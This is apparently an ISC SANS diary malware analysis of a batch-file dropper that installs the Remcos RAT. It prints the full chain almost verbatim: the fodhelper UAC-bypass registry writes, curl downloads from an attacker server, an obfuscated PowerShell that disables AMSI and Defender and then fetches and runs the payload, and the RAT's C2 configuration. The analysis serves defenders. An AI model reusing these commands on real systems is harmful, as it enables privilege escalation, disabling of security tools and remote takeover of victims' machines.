I found a simple batch file that drops a Remcos[1] RAT through an old UAC Bypass technique. This technique is based on the “fodhelper” utility (“Features On Demand Helper”). Once launched, this tool will search for specific registry keys and, if present, will execute their content with high privileges.
The script, called “2.bat”, is very simple. Note that opened into a text editor, it will display Chinese characters due to the BOM (Byte Order Mark):
remnux@remnux:/MalwareZoo/20220919$ xxd 2.bat
00000000: fffe 2663 6c73 0d0a 4065 6368 6f20 6f66 ..&cls..@echo of
00000010: 6620 0d0a 5469 746c 6520 257e 6e30 0d0a f ..Title %~n0..
00000020: 4d6f 6465 2036 302c 3320 0d0a 636f 6c6f Mode 60,3 ..colo
00000030: 7220 3042 0d0a 6563 686f 280d 0a65 6368 r 0B..echo(..ech
00000040: 6f20 2020 2020 2020 2020 506c 6561 7365 o Please
00000050: 2077 6169 742e 2e2e 2061 2077 6869 6c65 wait... a while
00000060: 204c 6f61 6469 6e67 2064 6174 6120 2e2e Loading data ..
00000070: 2e2e 0d0a 4345 5254 5554 494c 202d 6620 ....CERTUTIL -f
Here is the decoded script:
cls @echo off Title %~n0 Mode 60,3 color 0B echo( echo Please wait... a while Loading data .... CERTUTIL -f -decode "%~f0" "%Temp%2.bat" >nul 2>&1 cls "%Temp%2.bat" Exit -----BEGIN CERTIFICATE----- QGVjaG8gb2ZmDQplY2hvIFBsZWFzZSB3YWl0IDMwIHNlY29uZHM6IHdlJ3JlIGJ5 cGFzc2luZyB0aGUgQXV0aElEKEhXSUQpLiBUaGlzIHRyYXkgd2lsbCBhdXRvY2xv c2Ugb25jZSBmaW5pc2hlZC4NCmN1cmwuZXhlIC1zIC0tb3V0cHV0ICVVU0VSUFJP RklMRSVcTGlua3NccHVlZG8ucHMxIC0tdXJsIGh0dHA6Ly8xNzEuMjIuMzAuMTIw L3B1ZWRvLnBzMQ0KdGltZW91dCA1ID4gbnVsDQpjdXJsLmV4ZSAtcyAtLW91dHB1 dCAlVVNFUlBST0ZJTEUlXExpbmtzXGFkaGQuYmF0IC0tdXJsIGh0dHA6Ly8xNzEu MjIuMzAuMTIwL2FkaGQuYmF0DQp0aW1lb3V0IDUgPiBudWwNCmN1cmwuZXhlIC1z IC0tb3V0cHV0ICVVU0VSUFJPRklMRSVcTGlua3NcbmV0LnZicyAtLXVybCBodHRw Oi8vMTcxLjIyLjMwLjEyMC9uZXQudmJzDQp0aW1lb3V0IDUgPiBudWwNCnBvd2Vy c2hlbGwgTmV3LUl0ZW0gLVBhdGggSEtDVTpcU29mdHdhcmVcQ2xhc3Nlc1xtcy1z ZXR0aW5nc1xzaGVsbFxvcGVuXGNvbW1hbmQgLVZhbHVlICVVU0VSUFJPRklMRSVc TGlua3NcYWRoZC5iYXQgLUZvcmNlDQpwb3dlcnNoZWxsIE5ldy1JdGVtUHJvcGVy dHkgLVBhdGggSEtDVTpcU29mdHdhcmVcQ2xhc3Nlc1xtcy1zZXR0aW5nc1xzaGVs bFxvcGVuXGNvbW1hbmQgLU5hbWUgRGVsZWdhdGVFeGVjdXRlIC1Qcm9wZXJ0eVR5 cGUgU3RyaW5nIC1Gb3JjZQ0KZm9kaGVscGVyDQpleGl0DQpEZWwgJX4wIA0KDQpE ZWwgJX4wIA0K -----END CERTIFICATE-----
certutil.exe (a common LOLbin) is used to decode the Base64 data present in the file, dump a new bat file and launch it. This is performed thanks to the “%~f0” which returns the full path of the batch file itself. Here is the bat file:
@echo off
echo Please wait 30 seconds: we're bypassing the AuthID(HWID). This tray will autoclose once finished.
curl.exe -s --output %USERPROFILE%Linkspuedo.ps1 --url hxxp://171[.]22[.]30[.]120/puedo.ps1
timeout 5 > nul
curl.exe -s --output %USERPROFILE%Linksadhd.bat --url hxxp://171[.]22[.]30[.]120/adhd.bat
timeout 5 > nul
curl.exe -s --output %USERPROFILE%Linksnet.vbs --url hxxp://171[.]22[.]30[.]120/net.vbs
timeout 5 > nul
powershell New-Item -Path HKCU:SoftwareClassesms-settingsshellopencommand -Value %USERPROFILE%Linksadhd.bat -Force
powershell New-ItemProperty -Path HKCU:SoftwareClassesms-settingsshellopencommand -Name DelegateExecute -PropertyType String -Force
fodhelper
exit
Del %~0
Once fodhelper is launched, it will execute adhd.bat, which uses the same technique:
cls @echo off Title %~n0 Mode 60,3 color 0B echo( echo Please wait... a while Loading data .... CERTUTIL -f -decode "%~f0" "%Temp%adhd - Copia.bat" >nul 2>&1 cls "%Temp%adhd - Copia.bat" Exit -----BEGIN CERTIFICATE----- QGVjaG8gb2ZmDQplY2hvIEFsbW9zdCBmaW5pc2hlZDogaXQgd2lsbCBhdXRvcnVu cyBpbiBsZXNzIHRoYW4gMTUgc2Vjb25kcyENCmNkICVVU0VSUFJPRklMRSVcTGlu a3NcDQpQb3dlclNoZWxsIC1FeGVjdXRpb25Qb2xpY3kgQnlwYXNzIC1GaWxlICJw dWVkby5wczEiDQplY2hvIEFsbW9zdCBmaW5pc2hlZDogaXQgd2lsbCBhdXRvcnVu cyBpbiBsZXNzIHRoYW4gMTUgc2Vjb25kcyENCnRpbWVvdXQgMTAgPiBudWwNCnN0 YXJ0IG5ldC52YnMNCmV4aXQNCg0KDQpEZWwgJX4wIA0KDQpEZWwgJX4wIA0K -----END CERTIFICATE-----
The decoded Base64 contains:
@echo off echo Almost finished: it will autoruns in less than 15 seconds! cd %USERPROFILE%Links PowerShell -ExecutionPolicy Bypass -File "puedo.ps1" echo Almost finished: it will autoruns in less than 15 seconds! timeout 10 > nul start net.vbs exit Del %~0
The Powershell script “puedo.ps1” is responsible for downloading and executing the malware:
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) Set-MpPreference -DisableRealtimeMonitoring $trUE Set-MpPreference -DisableIOAVProtection $trUE powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:" powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:" curl.exe -s --output ("photoscreen$env:USERNAMELinksZu@E.jpeg".Replace('photo','C:').Replace('screen','Users').Replace('Zu@E','zoey').Replace('jpeg','exe')) --url ("colibri://google/Papero.exe".Replace('colibri','http').Replace('google','171[.]22[.]30[.]120')) cd C:Users$env:USERNAMELinks .zoey.exe exit
Note that the script tries to disable AMSI and Microsoft Defender. The malware is a Remcos RAT (SHA256:6e83574ed73d798183a1555a910dcc118ac05cf1eac77306ab6edfdcab9207c3) with the following config:
{ "c2": [ "171[.]22[.]30[.]7:5578" ], "attr": { "mutex": "asf4fas8sf48asf84as4f89huhhu99h9h-V446WS", "copy_file": "Isass.exe", "hide_file": false, "copy_folder": "Microsoft Updater", "delete_file": false, "keylog_file": "logs.dat", "keylog_flag": false, "audio_folder": "MicRecords", "install_flag": true, "install_path": "%ProgramFiles%", "keylog_crypt": false, "mouse_option": false, "connect_delay": "0", "keylog_folder": "remcos", "startup_value": "Windows Host Controller", "screenshot_flag": false, "screenshot_path": "%AppData%", "screenshot_time": "10", "connect_interval": "1", "hide_keylog_file": false, "screenshot_crypt": false, "audio_record_time": "5", "screenshot_folder": "Screenshots", "take_screenshot_time": "5", "take_screenshot_option": false }, "rule": "Remcos", "botnet": "Papero", "family": "remcos" }
[1] https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key
Source: https://isc.sans.edu/diary/rss/29078